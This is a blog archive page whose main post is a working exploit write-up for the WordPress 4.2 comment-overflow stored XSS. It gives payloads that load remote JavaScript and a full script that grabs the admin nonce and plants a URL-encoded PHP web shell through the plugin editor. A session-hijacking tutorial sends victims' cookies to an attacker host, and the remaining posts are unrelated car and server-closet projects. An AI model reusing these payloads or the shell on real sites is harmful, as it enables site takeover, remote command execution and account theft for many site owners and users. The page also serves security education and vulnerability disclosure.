Category Archives: Uncategorized

WordPress 4.2 Comment Field Overflow Exploit

While far from unique, the recent vulnerability in the WordPress 4.2 comment system is exceptionally egregious. The vast majority of WordPress attacks effect user installed plugins. Though these plugins often receive wide usage exploitation of associated vulnerabilities is limited to those users who individually added this content to their site. This vulnerability comes packaged with the default WordPress build.

What’s the big deal?

WordPress is the most popular blogging system in the world, and is used by over 60 million websites. The WordPress Content Management System (CMS) is so popular that it often sees usage on more then just blogs, yes even e-commerce sites. 23.3% of the top 10 million websites are WordPress, and unless these sites disabled the default comment system or installed an alternate comment plugin they are ALL vulnerable.

WordPress released an emergency patch for this vulnerability. If automatic updates are allowed the patch is pushed with 4.1.4. Alternately, upgrading WordPress to version 4.2.2 resolves this issue.

Comment Field Overflow Vulnerability

The vulnerability was discovered by Jouko Pynnonen and exploits a stored Cross Site Scripting (XSS) flaw. Effected software packages:

  • WordPress 4.2
  • WordPress 4.1.2
  • WordPress 4.1.1
  • WordPress 3.9.3

The bug itself is a result of a MySQL database limitation for very long posts. When WordPress stores the content of these uber long comments in the database MySQL truncates the result. This means that the closing tags in an HTML field like <a title are lost when the comment is loaded into the database. mysql-snip

Contents of the mysql database once the comment has been truncated and inserted

Theoretically, the truncation would break the tag rendering the XSS invalid. As a result WordPress fails browser-fix2to filter the content. In practice, however, while WordPress certainly fails to filter the dangerous content the user’s browser is much more helpful.

Because HTML is such a versatile language adherence to best practice coding syntax is not… universal. As a result browsers attempt to automatically fix coding issues like broken tags. The browser (tested in Chrome and Firefox) will add in an enclosing </a> tag as seen in the source code shot pictured.

And that gentlemen, is code execution. Now for the fun part, getting a shell!

Proof of Concept Alert

The proof of concept exploit below can be used to determine whether a site is vulnerable.

<a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px  AAAAA [64KB More As] AAA'></a>

Screen Shot 2015-05-16 at 6.54.02 PM

Executing Arbitrary Javascript

In order to fully leverage this attack we need to gain the ability to execute arbitrary JavaScript. This can be accomplished by hosting an external .js source file and using eval() embedded in an onmousover event against the target. See below:

<a title='xxx onmouseover=eval(unescape(/var%20a%3Ddocument.createElement%28%27script%27%29%3Ba.setAttribute%28%27src%27%2C%27http%3A%2f%2f10.0.0.184%2fexploit.js%27%29%3Bdocument.head.appendChild%28a%29/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px  AAAAA [64KB More As] AAA'></a>

Escalating To Shell Access in WordPress

Now that we have the ability to execute arbitrary remote JavaScript on the target we need to come up with a snazy way to use it! In WordPress an Administrator can use the builtin plugin editor to modify installed plugins. This effectively means: there is a page on the site that takes POST requests with PHP code!!!! Hint: The page is called plugin-editor.php

Using the xmlHTTPRequest() AJAX library we can make post and get requests with JavaScript. We first make a get request to a random page to get an admin csrftoken. The next step is to pull the token out of the HTTP response data and replay it to the plugin editor along with our payload. In this case I urlencoded my personal PHP shell (because I know the code and like it better than c99 and others). You are welcome to use it if you want, use the urldecoder here and the source below if interested. Alternately, you could just urlencode a PHP meterpreter and browse to the location whenever you are in need of a session.

Note: This attack overwrites one of the WordPress default plugins. I like to use akismet/akismet.php because it is installed be default and performs a useful function (as opposed to the hello dolly plugin, which I typically delete on my personal WordPress installs).

function get(url)
{
    var http = null;

    http = new XMLHttpRequest();
    http.open( "GET", url, false );
    http.send( null );
    return http.responseText;
}


function post(url, csrftoken)
{
    var http = null;

    http = new XMLHttpRequest();
    http.open( "POST", url, false );
    http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
    http.send("_wpnonce=" + csrftoken + "&_wp_http_referer=/wp-admin/plugin-editor.php?file=hello.php&plugin=hello.php&newcontent=78%3C%21-----------------------------------------------------------------%0A%09%09%090sm0s1z%0A%0AThe+Purpose+of+this+file+is+to+act+as+a+Remote+File+Inclusion+vector+to+exploit+a+web+page+through+a+Persisten+Vulnerability.%0A------------------------------------------------------------------%3E%0A%0A%3Chtml%3E%0A%3Ctitle%3EH4X0R3D%3C%2Ftitle%3E%0A%3Chead%3E%0A%0A%3C%21------------------------------%0Awanna+put+some+javascript+here%3F%0A-------------------------------%3E%0A%0A%3C%2Fhead%3E%0A%0A%3Cbody%3E%0A%0A%3C%21---------------------------------------------%0APHP+Terminal%0A----------------------------------------------%3E%0A%0A%3Ch3%3ETerminal%3A%3C%2Fh3%3E%0A%0A%0A%3Cform+method%3D%22post%22+action%3D%22%3C%3Fphp+echo+%24_SERVER%5B%27PHP_SELF%27%5D%3B%3F%3E%22%3E%0A0sm0s1z%3E%3Cinput+type+%3D+%22text%22+name+%3D+%22cmd%22+%2F%3E%0A%3C%2Fform%3E%0A%0A%3C%3Fphp%0Aif%28isset%28%24_POST%5B%27cmd%27%5D%29%29%0A%7B%0A%0A%0A%0Aecho+%27%3Cpre%3E%27%3B%0A%0A%24cmd+%3D+%24_POST%5B%27cmd%27%5D%3B%0A%0A%24last_line+%3D+system%28%24cmd%2C+%24retval%29%3B%0A%0A%2F%2F+Printing+additional+info%0Aecho+%27%0A%3C%2Fpre%3E%0A%3Chr+%2F%3ELast+line+of+the+output%3A+%27+.+%24last_line+.+%27%0A%3Chr+%2F%3EReturn+value%3A+%27+.+%24retval%3B%0Aecho+%27%3Chr+%2F%3E%27%3B%0A%0A%0A%7D%0A%3F%3E%0A%0A%0A%3C%21---------------------------------------------%0APHP+File+Upload+With+Directory+Selection%0A----------------------------------------------%3E%0A%0A%3Ch3%3EFile+Upload%3A%3C%2Fh3%3E%0A%0A%3Cform+enctype%3D%22multipart%2Fform-data%22+action%3D%22%3C%3Fphp+echo+%24_SERVER%5B%27PHP_SELF%27%5D%3B%3F%3E%22+method%3D%22POST%22%3E%0A%3Cinput+type%3D%22hidden%22+name%3D%22up%22+%2F%3E%0AChoose+a+file+to+upload%3A+%3Cinput+name%3D%22uploadedfile%22+type%3D%22file%22+%2F%3E%3Cbr+%2F%3E%0AFile+Path%3A%3Cinput+type+%3D+%22text%22+name+%3D+%22path%22+%2F%3E%3Cbr+%2F%3E%0A%3Cinput+type%3D%22submit%22+value%3D%22Upload+File%22+%2F%3E%0A%3C%2Fform%3E%0A%0A%3C%3Fphp%0Aif%28isset%28%24_POST%5B%27path%27%5D%29%29%0A%7B%0A%0A%0A%24target_path+%3D+%22%22%3B%0A%0A%24target_path+%3D+%24_POST%5B%27path%27%5D%3B%0A%0A%24target_path+%3D+%24target_path+.+basename%28+%24_FILES%5B%27uploadedfile%27%5D%5B%27name%27%5D%29%3B+%0A%0Aif%28move_uploaded_file%28%24_FILES%5B%27uploadedfile%27%5D%5B%27tmp_name%27%5D%2C+%24target_path%29%29+%7B%0A++++echo+%22The+file+%22.++basename%28+%24_FILES%5B%27uploadedfile%27%5D%5B%27name%27%5D%29.+%0A++++%22+has+been+uploaded%22%3B%0A%7D+else%7B%0A++++echo+%22There+was+an+error+uploading+the+file%2C+please+try+again%21%22%3B%0A%7D%0A%0A%0A%0A%7D%0A%3F%3E%0A%0A%0A%0A%3C%21---------------------------------------------%0AVulnerability+Test+Box%0A----------------------------------------------%3E%0A%0A%3Ch3%3ETest+Vectors+Here%3A%3C%2Fh3%3E%0A%0A%3Cform+enctype%3D%22multipart%2Fform-data%22+action%3D%22%3C%3Fphp+echo+%24_SERVER%5B%27PHP_SELF%27%5D%3B%3F%3E%22+method%3D%22POST%22%3E%0A%3Cinput+type+%3D+%22text%22+name+%3D+%22test%22+%2F%3E%0A%3C%2Fform%3E%0A%3C%3Fphp%0Aif%28isset%28%24_POST%5B%27test%27%5D%29%29%0A%7B%0A%0A%24test+%3D+%24_POST%5B%27test%27%5D%3B%0A%0Aecho+%24test%3B%0A%0A%7D%0A%3F%3E%0A%0A%0A%0A%0A%0A%0A%3C%21---------------------------------------------%0AInclusion%0A----------------------------------------------%3E%0A%0A%0A%3Chr+%2F%3E%0A%3Cpre%3E%0Ainject%3A%09++%09+include%28%27mysite.php%27%29%3B+%3Cbr%3E%0ATo+exploit+Remote+File+Inclusion+Vulnerability%0A%3C%2Fpre%3E%0A%3Chr+%2F%3E%0A&action=update&file=hello.php&plugin=hello.php&scrollto=0&submit=Update+File");
    return http.responseText;

}

var page = get("/wp-admin/plugin-editor.php?file=akismet%2Fakismet.php&plugin=akismet%2Fakismet.php");

var regExp = /name=\"_wpnonce\"\svalue=\"([^)]+)\"/;
var matches = regExp.exec(page);
var csrftoken = matches[1].slice(0, 10);

post("/wp-admin/plugin-editor.php", csrftoken);

The WordPress 4.2 Comment Exploit

I wrote a Metasploit module to trigger this vulnerability:

https://github.com/0sm0s1z/WordPress-Comment-Overflow

session

The Patch

WordPress patched this flaw by disabling long comments…. Well Done….

wp-patch

Conclusion

Hopefully this post was an interesting read! If you have any thoughts on the WordPress 4.2 Comment Exploit, my Metasploit module, or a suggestion/topic you’d like covered let me know in the comments below. FYI I use Disqus, sorry :)

Further Reading:

[1] https://blog.sucuri.net/2015/04/critical-persistent-xss-0day-in-wordpress.html
[2] http://arstechnica.com/security/2015/04/just-released-wordpress-0day-makes-it-easy-to-hijack-millions-of-websites/
[3] http://thehackernews.com/2015/04/WordPress-vulnerability.html
[4] http://klikki.fi/adv/wordpress2.html
[5] https://core.trac.wordpress.org/changeset/32311/branches/4.2/src/wp-admin/includes/upgrade.php

Engine Compartment Cleaning

This took a LOT of scrubbing! Followed by painting. Rust was a very significant concern so I spent a lot of time sanding the sucker down and then repainting in order to mitigate long term wear and tear as much as possible.

Tools used:

Rust-Oleum 7582838 Professional Primer Spray Paint, Gray Primer, 15-Ounce

Rust-Oleum 239107 Professional Spray Paint, Semi-Gloss Black, 15-Ounce

After scrubbing I put down a couple coats of primer

primed

Next a couple coats of paint, and she cleaned up nice!

painted

Mustang Project – Week 1

Much tinkering was done. This week I placed an order for an [ingersol rand impact drill and the associated hardware]. While waiting for that, I began work on the vehicle body. I started fabricating the front bumper (note I’m building the chin spoiler separately). I completed the bumper’s shell and should only have to reinforce/layer the part in order to get it into working shape. I also removed the radiator and began shaping the hood.

Lesson learned this  week: fiberglass burns! Don’t dump it on yourself (it also turns your jeans into plastic)

Tools used this week:

  • Dewalt Power Drill
  • Orbital Sander
  • Fiberglass Kit
    • Respirator
    • Fiberglass cloth (6oz)
    • Bondo Resin
    • Cheap Brushes
    • Fiberglass Roller
    • Latex Gloves
  • Molding Clay (terra cotta)
  • Insulation (blue) foam
  • Various Screws

The Endeavor

Fiberglass’d

I began by ripping the bumper off with a ratchet. I think it’s safe to discard. It looks bad, is heavy, and I’m not sure it’s structurally necessary. The front pegs it was attached to are still there providing support. Furthermore, once I remove the engine, the engine compartment won’t need as much protection… I think. Anyway it will look cool!

bumper

Next I began work on the replacement bumper. Originally, I wanted to build the whole thing out of clay to form the mold, but that turned out to be prohibitively heavy. The bumper came apart under its own weight, dang gravity!

For my next attempt I purchased [insulation foam] from Lowes. I used this with my [power drill] and some hardware to build the shape. I then sanded it down to allow the clay to better grip the surface. Finally, I covered the thing in clay to form the final shape.

clay_bumper

I now covered the thing in aluminum foil, waxed the foil with a mold release, and applied resin. Next I chopped up the fiberglass cloth and began layering it. I waited for the first layer to be about halfway dry before adding the second, and I applied additional resin after each layer. I only layered it twice for now to give the piece a semi-rigid form but will add additional layers to get the part to where I want it.

Bumper_Fiberglass

The final step will be to sand it until happy. I’m also not sure what it will look like until after I add the chin spoiler so I intend to fabricate that before going much deeper into the weeds on the bumper itself.

Other Work

I ripped out the radiator:

under_the_hood

And I began working on the hood mold:

clay_hood

Alright! That’s all for this week. Next week I should be receiving my air drill, and I intend to buy an engine hoist. The plan is to finish the hood, drain the engine, and get the engine out! Lots of work gotta get ‘er done!

HTTP Code Injection

This page is currently under construction. It exists as a placeholder for a Subterfuge tutorial, once the tutorial is finished I will update the page to reflect the new content. I apologize for the inconvenience.

Happy Hacking!

——————–

Here we are discussing the subject of session hijacking attacks within the scope of an HTTP/HTTPS conversation. It is important to note several distinctions here. Firstly, session hijacking is a vulnerability of many protocols, but we will only be examining web traffic, and secondly, performing session hijacking over HTTPS is a much more involved process then doing the same to its less evolved cousin. In this post we will not be directly attacking HTTPS, but we will; however, discuss methods to get around it.

Session Hijacking: The process of assuming control of an active or latent TCP/IP session through impersonation of a user by way of a session identifier as opposed to legitimate authentication credentials.

HTTP Sessions

Web is a stateless protocol. This means that the web server does not, and cannot remember who you are in between browser requests. Each time you click a link on a website the webserver thinks that you are an entirely new person. This facet of the protocol we have most closely come to identify with on the Internet is extremely problematic. If a web server does not remember who we are, how can it remember what is in our shopping cart, or more importantly whom that cart belongs to? To solve this issue we have session cookies.

Here’s an example of a session cookie embedded within a TCP Stream:

[Example Pic]

Most importantly, this cookie is sent along with every single HTTP request your browser makes to the associated web server. If we steal this cookie from a victim, and tell our browser to use it whilst communicating with the server, we can essentially become them. If you are interested in an example of how to modify your browser cookies through URL injection check out this [post].

Stealing Session Cookies

So how do we acquire session cookies from victims? Really the limit here is your creativity, but some criteria must be met. As the penetration tester you must be able to leverage some form of access to the flow of data that the cookie follows. This means you need access to either the data a rest, or the data in motion.

Data at Rest

With the exception of potential caching at proxies and other network resources there are two primary locations where cookies live: on the web server and on the client computer. We now have two targets.

Data in Motion

Alternately, if we have access to any host that must route the web traffic it is trivial to pull the session cookie out of the TCP stream, but there is a problem. These days most cookies are no longer sent across the Internet in plaintext. They use HTTPS. This means that access to routers along the path the data takes is not enough steal the plaintext cookie needed to perpetrate session hijacking. We’ll end by demonstrating a method to get around this issue using Subterfuge.

Attacking the Web Server

This attack requires the exploitation of some kind of vulnerability in a web application on the target web server. If you can get code to execute in the victims browser then you can steal their session cookies. It is important to note that we only need the victim’s browser to execute the code, not the web server itself. This means that we don’t need to be able to render a server based language like PHP. For our purposes JavaScript is good enough. Below is an example of a simple cookie stealer script:

document.location='http://IP:PORT/grab.cgi?'+document.cookie;

Once we inject this into the target website the simple act of a victim browsing to the webpage will cause the plaintext cookie to be transmitted to our webserver. The last step is to retrieve the cookies from our webserver. Typically this is done with a catcher script, but we’re going to be a bit different. Below is a bash script to pull the cookies out of your apache logs. By using this we can theoretically utilize a compromised webserver to perpetrate our attack without leaving behind any artifacts like a cookie stealer script!

[Apache Logs Cookie Parser Script]

Attacking the User

We will only be discussing the Firefox browser here; however, the same techniques can be applied regardless of browser. If you are able to trigger a vulnerability to gain access to a victim’s machine you may be able to directly access the cookie database associated with his browser profile. Firefox uses an SQLite database to store session cookies. In order to dump the database, run the following commands:

 

Then read the plaintext cookies!

Attacking the Network with Subterfuge

A new feature in Subterfuge 5.1 is Session Hijacking. Subterfuge comes with multiple methods of achieving a man-in-the-middle position on victim traffic. Now it can also harvest web session cookies. In order to do this, start a MITM attack. When a victim browses to a website that uses cookies Subterfuge will automatically log them and display the data on screen.

 

The next step is to use Subterfuge’s cookie swapper script to impersonate the victim. Click on CookieSwapper, and copy the JavaScript that pops up.

 

[CookieSwapper Pic]

 

Paste the script into a text editor. We now have to set the value of the cookie we want to impersonate. In Subterfuge, clicking on the session allows you to copy the cookie value.

 

[Cookie Copy Pic]

 

In your text editor replace section of the script that says “COOKIE DATA GOES HERE!!!” with the value you copied from subterfuge (be sure to put the data within “”).

The final step is to tell our browser to use this cookie when communicating with a target webserver. To this first browse to the target website. When you are there open your browser’s scripting console. This allows you to run arbitrary JavaScript within your browser window. In Chrome this can be done by: right click -> inspect element -> click on the “show console” icon in the bottom left corner. In Firefox (which we used in the making of this tutorial) use the key command: ctrl + shift + k. Paste your script into the console at the bottom of the page denoted by >.

 

[Script Console Pic]

 

Refresh the page and enjoy your session!

 

For a video of this attack in action click [here].

Countermeasures

 

I hope that this post thoroughly demonstrates the dangers of session hijacking. Attackers really don’t need your login username and password to wreak havoc on your online footprint. Don’t leave your security up to the vendors, or network operators, because they have no incentive to protect you! Take your security into your own hands.

 

To protect yourself from attacks like this one we recommend the use of encryption to encapsulate your traffic when operating on untrusted networks. OpenVPN is an outstanding protocol, and is fairly simple to setup as well. Client programs exist for all major operating systems including Android and iOS. Personally, I use [Link TunnelBlick] on my Mac, and the official clients elsewhere.

 

I hope that this post has been informative for you!

Rogue DHCP Server

This page is currently under construction. It exists as a placeholder for a Subterfuge tutorial, once the tutorial is finished I will update the page to reflect the new content. I apologize for the inconvenience.

Happy Hacking!

WPAD Hijacking

This page is currently under construction. It exists as a placeholder for a Subterfuge tutorial, once the tutorial is finished I will update the page to reflect the new content. I apologize for the inconvenience.

Happy Hacking!

DIY – Custom Server Closet

Why make your Closet this Awesome?

image

  • I have a lot of computer gear
  • Servers are cool
  • Server racks are expensive
  • Staring at the blinking lights for hours on end saves me money on movie tickets

FYI: This is still a work in progress, and I’ll update this post as I continue construction (wanted to use that word so badly, makes me feel all blue collar).

Goal:

Convert a typical bedroom closet into a fully functional server room, without buying any prefabricated equipment.

Table Top

Materials:

  • 41.5″ x 29″ Plexiglass sheet
  • 50″ Wooden Border Panel
  • Hardware: Wood Screws & Machined Bolts + Nuts, Wall Mounts

TableTop

Built-in Server Rack

Materials:

  • Aluminum Rails
  • 2x2x10 Wooden Block
  • Hardware: Wood Screws & Machined Bolts + Nuts

Tools:

  • Cordless Drill
  • Hacksaw
  • File

image

image

Will additional info on what I did and how later.

imageNext Task:

That big open motherboard looking thing on top of the table is actually going to get built directly into the server rack. To do that I have to add aluminum legs to the back two corners, and then aluminum struts to the sides of the computer case itself (also plexiglass I built the whole thing a while back from spare parts, ebay, Lowes. The end result was a dual quad core xeon server for about $220 including the case.)

At that point the whole mechanism should slide right in, and I’ll be able to add the rest of my gear (mostly cisco catalyst switches) to the rack and be more or less good to go!

Oh! and LEDs too. Let’s not forget those blinking lights…

FAQ

Getting Started

  1. Is Subterfuge free for download?
  2. What Operating Systems is Subterfuge built for?
  3. What dependencies does Subterfuge require?
  4. Help! I’m having browser issues
  5. How can I report a new bug?
  6. I see lots of errors in the terminal window what am I doing wrong?
  7. How do I run Subterfuge as an externally navigable server?
  8. How do I uninstall Subterfuge?
  9. What kind of support is there
  10. How can I contact you?

For issues not covered here see: Troubleshooting

1. Is Subterfuge free for download?

Screen Shot 2013-03-14 at 4.39.59 PM

2. What Operating Systems is Subterfuge built for?

Screen Shot 2013-03-14 at 4.40.13 PM

3. What dependencies does Subterfuge require?

Screen Shot 2013-03-14 at 4.40.23 PM

4. Help! I’m having browser issues 

Screen Shot 2013-03-14 at 4.40.34 PM

5. How can I report a new bug?

Screen Shot 2013-03-14 at 4.40.42 PM

6. I see lots of errors in the terminal window what am I doing wrong? 

Screen Shot 2013-03-14 at 4.40.54 PM

7. How do I run Subterfuge as an externally navigable server? 

Screen Shot 2013-03-14 at 4.41.05 PM

8. How do I uninstall Subterfuge?Screen Shot 2013-03-14 at 4.41.13 PM

9. What kind of support is there?

Screen Shot 2013-03-14 at 4.41.24 PM

10. How can I contact you?

Screen Shot 2013-03-14 at 4.41.37 PM